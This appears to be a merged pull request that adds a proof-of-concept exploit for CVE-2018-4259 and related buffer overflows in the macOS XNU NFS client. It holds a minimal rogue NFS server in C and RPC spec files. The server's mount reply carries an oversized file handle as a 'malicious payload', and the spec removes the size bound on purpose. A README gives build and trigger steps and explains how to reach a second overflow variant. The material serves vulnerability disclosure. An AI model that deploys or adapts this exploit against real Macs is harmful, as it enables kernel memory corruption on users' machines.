Merge pull request #16 from kev/Apple_XNU_nfs_vfsops_CVE-2018-4259

Exploit PoC for buffer overflow vulnerability in Mac OS NFS client

Author: Sam

apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/.gitignore

@@ -0,0 +1,6 @@
+kevfs
+nfs_clnt.c
+nfs_svc.c
+nfs_xdr.c
+nfs.h
+*.o

apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/Makefile

@@ -0,0 +1,21 @@
+kevfs: nfs_svc.o nfs_xdr.o kevfs.o
+	gcc -g -O0 -Wall nfs_svc.o nfs_xdr.o kevfs.o -o kevfs
+
+kevfs.o: kevfs.c
+	gcc -g -O0 -c -Wall kevfs.c
+
+nfs_svc.o: nfs_svc.c
+	gcc -g -O0 -c -Wall nfs_svc.c
+
+nfs_xdr.o: nfs_xdr.c
+	gcc -g -O0 -c nfs_xdr.c
+
+nfs_svc.c: nfs.h
+
+nfs_xdr.c: nfs.h
+
+nfs.h: nfs.x
+	rpcgen nfs.x
+
+clean:
+	rm -f *~ *.o nfs_clnt.c nfs_svc.c nfs_xdr.c nfs.h kevfs

apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md

@@ -0,0 +1,23 @@
+## Buffer overflows in macOS NFS client (CVE-2018-4259, CVE-2018-4286, CVE-2018-4287, CVE-2018-4288, CVE-2018-4291)
+
+This directory contains a minimal [NFS](https://en.wikipedia.org/wiki/Network_File_System) server. It only implements a very small subset of the [NFS protocol](https://www.ietf.org/rfc/rfc1813.txt): just enough to trigger one of the buffer overflow vulnerabilities in the macOS XNU operating system kernel. The vulnerabilities were fixed in macOS version [10.13.6](https://support.apple.com/en-gb/HT208937).
+
+For more details about the vulnerabilities, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_nfs_vfsops_CVE-2018-4259).
+
+To compile and run (on Linux):
+
+```bash
+$ make
+$ ./kevfs
+```
+
+To trigger the exploit, you need to attempt to mount a folder on the Mac. Suppose the IP address of the server is `192.168.0.15`:
+
+```bash
+$ mkdir ~/mnt
+$ mount -t nfs 192.168.0.15:/export ~/mnt
+```
+
+Note that `sudo` access is not required to trigger the bug on the Mac, because we are only attempting to mount to `~/mnt`.
+
+There is a second vulnerability which can be triggered with a small modification to the server: it should return an `fhandle3` with size `0xFFFFFFFF`. This requires a change to the code, because we don't want to send a 4GB payload with the message. The simplest way to do this is to change the definition of `fhandle3` in `nfs.x` so that it contains a `uint32`, rather than an `opaque`. The uint needs to be initialized to 0xFFFFFFFF in `kevfs.c`.

apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/kevfs.c

@@ -0,0 +1,43 @@
+/**
+ * This file implements a minimal subset of the RPC protocol for NFS.
+ * Its purpose is to demonstrate that there is a buffer overflow
+ * vulnerability in the kernel of Mac OS version 10.13.5.
+ */
+
+#include <rpc/rpc.h>
+#include <stdio.h>
+#include "nfs.h"
+
+static int void_buf = 0;
+
+void* nfsproc3_null_3_svc(void *x, struct svc_req *req) {
+  printf("nfsproc3_null_3_svc\n");
+  return &void_buf;
+}
+
+void* mountproc3_null_3_svc(void *x, struct svc_req *req) {
+  printf("mountproc3_null_3_svc\n");
+  return &void_buf;
+}
+
+mountres3* mountproc3_mnt_3_svc(dirpath *path, struct svc_req *req) {
+  static struct mountres3 result;
+  static int auth_flavors[1] = {1}; // RPCAUTH_SYS
+  static const uint32_t far_too_big_fhandle3_size = 0x1000;
+
+  printf("mountproc3_mnt_3_svc\n");
+
+  result.fhs_status = 0;
+
+  // Malicious payload. Note: there is a second vulnerability which can be
+  // triggered by setting far_too_big_fhandle3_size == 0xFFFFFFFF. But this
+  // will only work if we manually edit the auto-generated file nfs_xdr.c
+  // so that it doesn't attempt to create a message with 4GB of data.
+  result.mountres3_u.mountinfo.fhandle.data.data_len = far_too_big_fhandle3_size;
+  result.mountres3_u.mountinfo.fhandle.data.data_val = malloc(far_too_big_fhandle3_size);
+  memset(result.mountres3_u.mountinfo.fhandle.data.data_val, 0, far_too_big_fhandle3_size);
+
+  result.mountres3_u.mountinfo.auth_flavors.auth_flavors_len = 1;
+  result.mountres3_u.mountinfo.auth_flavors.auth_flavors_val = auth_flavors;
+  return &result;
+}

apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/nfs.x

@@ -0,0 +1,60 @@
+/*
+ * This file contains a subset of the RPC protocol for NFS, as described in
+ * RFC 1813:
+ *
+ * https://www.ietf.org/rfc/rfc1813.txt
+ *
+ * Apart from omitting parts of the protocol that are not needed, only one
+ * modification has been made:
+ *
+ * 1. The upper bound of the opaque data in an fhandle3 has been omitted,
+ *    to demonstrate a buffer overflow in Mac OS version 10.13.5.
+ */
+
+struct fhandle3 {
+  opaque data<>;  /* Note: upper bound deliberately omitted */
+};
+
+enum mountstat3 {
+  MNT3_OK = 0,                 /* no error */
+  MNT3ERR_PERM = 1,            /* Not owner */
+  MNT3ERR_NOENT = 2,           /* No such file or directory */
+  MNT3ERR_IO = 5,              /* I/O error */
+  MNT3ERR_ACCES = 13,          /* Permission denied */
+  MNT3ERR_NOTDIR = 20,         /* Not a directory */
+  MNT3ERR_INVAL = 22,          /* Invalid argument */
+  MNT3ERR_NAMETOOLONG = 63,    /* Filename too long */
+  MNT3ERR_NOTSUPP = 10004,     /* Operation not supported */
+  MNT3ERR_SERVERFAULT = 10006  /* A failure on the server */
+};
+
+program NFS_PROGRAM {
+  version NFS_V3 {
+    void
+      NFSPROC3_NULL(void) = 0;
+  } = 3;
+} = 100003;
+
+const MNTPATHLEN = 1024;
+typedef string dirpath<MNTPATHLEN>;
+
+struct mountres3_ok {
+  fhandle3 fhandle;
+  int auth_flavors<>;
+};
+
+const MNT_OK = 0;
+
+union mountres3 switch (mountstat3 fhs_status) {
+case MNT_OK:
+  mountres3_ok  mountinfo;
+default:
+  void;
+};
+
+program MOUNT_PROGRAM {
+  version MOUNT_V3 {
+    void      MOUNTPROC3_NULL(void) = 0;
+    mountres3 MOUNTPROC3_MNT(dirpath) = 1;
+  } = 3;
+} = 100005;